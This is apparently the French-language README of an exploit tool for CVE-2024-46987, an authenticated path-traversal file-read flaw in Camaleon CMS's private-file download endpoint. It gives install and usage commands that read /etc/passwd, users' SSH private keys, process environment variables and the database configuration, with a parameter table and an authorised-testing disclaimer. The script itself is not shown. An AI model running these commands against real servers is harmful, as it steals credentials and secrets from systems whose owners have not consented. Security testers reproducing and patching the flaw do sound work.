
CVE-2024-46987 - Camaleon CMS LFI Exploit
Exploit d'Inclusion Locale de Fichiers (LFI) authentifié pour Camaleon CMS.
Camaleon CMS est vulnérable à une attaque LFI authentifiée via le point de terminaison /admin/media/download_private_file. Le paramètre file n'est pas correctement assaini, ce qui permet un parcours de chemin pour lire des fichiers arbitraires sur le serveur.
pip install requests
# Afficher le fichier dans le terminal (par défaut)
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token"
# Enregistrer dans un fichier
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token" -o passwd.txt
# Lire le fichier passwd
python3 exploit.py -u https://example.com -f /etc/passwd -t "auth_token"
# Lire les clés SSH
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "auth_token" -o id_rsa
# Lire les variables d'environnement
python3 exploit.py -u https://example.com -f /proc/self/environ -t "auth_token"
# Lire la configuration de l'application
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "auth_token"
Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. Utilisez-le uniquement contre des systèmes pour lesquels vous avez une autorisation explicite de test.
| Paramètre | Description |
|---|
-u, --url | URL cible |
-f, --file | Fichier à lire (ex. /etc/passwd) |
-t, --token | Valeur du cookie auth_token |
-o, --output | Nom du fichier de sortie (optionnel, affiche dans le terminal si non défini) |